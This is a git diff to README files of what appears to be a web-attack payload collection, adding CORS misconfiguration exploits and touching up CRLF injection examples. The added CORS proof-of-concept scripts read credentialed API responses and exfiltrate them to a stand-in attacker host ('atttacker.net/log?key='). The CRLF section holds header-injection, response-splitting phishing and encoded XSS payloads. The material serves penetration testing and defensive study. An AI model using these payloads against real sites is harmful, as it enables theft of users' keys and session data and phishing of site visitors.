diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index cc066f9..32f00ad 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -22,7 +22,7 @@ ## Exploitation -Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**. +Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target `https://victim.example.com/endpoint`. ### Vulnerable Example: Origin Reflection @@ -43,6 +43,8 @@ Access-Control-Allow-Credentials: true #### Proof of concept +This PoC requires that the respective JS script is hosted at `evil.com` + ```js var req = new XMLHttpRequest(); req.onload = reqListener; @@ -173,6 +175,75 @@ function reqListener() { }; ``` +### Vulnerable Example: Expanding the Origin / Regex Issues +Occasionally, certain expantions of the original origin are not filtered on the server side. This might be caused by using a badly implemented regular expressions to validate the origin header. + +#### Vulnerable Implementation (Example 1) + +In this scenario any prefix inserted in front of `example.com` will be accepted by the server. + +``` +GET /endpoint HTTP/1.1 +Host: api.example.com +Origin: https://evilexample.com + +HTTP/1.1 200 OK +Access-Control-Allow-Origin: https://evilexample.com +Access-Control-Allow-Credentials: true + +{"[private API key]"} + +``` + +#### Proof of concept (Example 1) + +This PoC requires the respective JS script to be hosted at `evilexample.com` + +```js +var req = new XMLHttpRequest(); +req.onload = reqListener; +req.open('get','https://api.example.com/endpoint',true); +req.withCredentials = true; +req.send(); + +function reqListener() { + location='//atttacker.net/log?key='+this.responseText; +}; +``` + +#### Vulnerable Implementation (Example 2) + +In this scenario the server utilizes a regex where the dot was not escaped correctly. For instance, something like this: `^api.example.com$` instead of `^api\.example.com$`. Thus, the dot can be replaced with any letter to gain access from a third-party domain. + +``` +GET /endpoint HTTP/1.1 +Host: api.example.com +Origin: https://apiiexample.com + +HTTP/1.1 200 OK +Access-Control-Allow-Origin: https://apiiexample.com +Access-Control-Allow-Credentials: true + +{"[private API key]"} + +``` + +#### Proof of concept (Example 2) + +This PoC requires the respective JS script to be hosted at `apiiexample.com` + +```js +var req = new XMLHttpRequest(); +req.onload = reqListener; +req.open('get','https://api.example.com/endpoint',true); +req.withCredentials = true; +req.send(); + +function reqListener() { + location='//atttacker.net/log?key='+this.responseText; +}; +``` + ## Bug Bounty reports * [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) @@ -188,3 +259,4 @@ function reqListener() { * [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) * [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/) * [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors) +* [CORS Misconfigurations Explained - Detectify Blog](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/) diff --git a/CRLF Injection/README.md b/CRLF Injection/README.md index 534228a..04fe4f8 100644 --- a/CRLF Injection/README.md +++ b/CRLF Injection/README.md @@ -16,13 +16,13 @@ Requested page -```powershell +```http http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue ``` HTTP Response -```powershell +```http Connection: keep-alive Content-Length: 178 Content-Type: text/html @@ -45,7 +45,7 @@ http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23 HTTP Response -```powershell +```http HTTP/1.1 200 OK Date: Tue, 20 Dec 2016 14:34:03 GMT Content-Type: text/html; charset=utf-8 @@ -70,13 +70,13 @@ X-XSS-Protection:0 Requested page -```powershell +```http http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E ``` HTTP response -```powershell +```http Set-Cookie:en Content-Length: 0 @@ -92,7 +92,7 @@ Content-Length: 34 Using UTF-8 encoding -```powershell +```http %E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE ``` @@ -103,6 +103,11 @@ Remainder: * %E5%98%BE = %3E = \u563e (>) * %E5%98%BC = %3C = \u563c (<) + +## Exploitation Tricks +* Try to search for parameters that lead to redirects and fuzz them +* Also test the mobile version of the website, sometimes it is different or uses a different backend + ## References * https://www.owasp.org/index.php/CRLF_Injection